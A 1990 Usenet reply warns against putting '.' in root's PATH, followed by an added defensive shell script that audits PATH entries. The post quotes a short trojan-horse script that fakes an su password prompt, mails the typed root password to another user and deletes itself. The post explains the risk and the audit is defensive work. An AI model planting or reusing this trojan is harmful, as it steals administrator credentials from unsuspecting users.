. in $path

John H Merritt merritt at iris613.gsfc.nasa.gov
Fri Apr 13 04:07:48 AEST 1990


In article <283:doelz at urz.unibas.ch> doelz at urz.unibas.ch (Reinhard Doelz) writes:
>
>
>The *root* may not use it, otherwise it's fine. Imagine you're su'ing around
>and some weird guy aliased ls to rm.
                    ^^^^^^^  <-- he means, has a command or program named ...


More concretely, it prevents someone gaining root capabilities through
a trojan horse.  Consider the following program, from UNIX Today April 2, 1990.

Chump=$1
stty -echo
echo "Password:\c"
read ChumpsPwd
echo ""
stty echo
echo $Chump\'s passwd is $ChumpsPwd \
 | mail cybrpunk
sleep 1
echo "su:Sorry"
rm su

This program is placed in every publicly writable directory and
eventually someone will execute it; it reports failure the first time and
the user thinks he typed the wrong password and never knows he just
gave the root password away.

Another popular trojan horse is 'ls'.

If you must have '.' in the path, it should be last.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
John H. Merritt                   #  Yesterday I knew nothing,
Applied Research Corporation      #  Today I know that.
merritt at iris613.gsfc.nasa.gov     #
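
A defender's check for the risk this message describes, as an added example that is not part of the original post: it audits a PATH string and reports every entry that resolves to the current directory, distinguishing "searched last" from "searched earlier". It goes beyond the message in also treating empty and relative entries as the current directory and in flagging world-writable directories; `audit_path` is a hypothetical helper name and the sample PATH is constructed.

```shell
#!/bin/sh
# Added example: audit a PATH string for entries that let a planted
# "su" or "ls" in a shared directory run instead of the real command.

audit_path() {
    rest="$1:"      # sentinel colon so a trailing empty entry is not lost
    n=0 rc=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}       # next entry, possibly empty
        rest=${rest#*:}         # remainder; empty once the last entry is taken
        n=$((n + 1))
        case $entry in
            ''|.|[!/]*)
                # Empty, ".", and relative entries all resolve against the cwd.
                if [ -n "$rest" ]; then
                    printf 'HIGH %d "%s" current directory searched before later entries\n' "$n" "$entry"
                else
                    printf 'WARN %d "%s" current directory searched last\n' "$n" "$entry"
                fi
                rc=1 ;;
            *)
                # Absolute entry: flag it if any user may create files in it.
                case $(ls -ldL "$entry" 2>/dev/null) in
                    d???????w*)
                        printf 'HIGH %d "%s" world-writable directory\n' "$n" "$entry"
                        rc=1 ;;
                esac ;;
        esac
    done
    return $rc      # 0 = no findings, 1 = at least one finding
}

# Constructed sample: leading empty entry, "." in the middle, "." at the end.
audit_path ":/usr/bin:.:/bin:." || true
```

Run it against root's real search path with `audit_path "$PATH"`; a nonzero exit status means at least one finding was printed.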


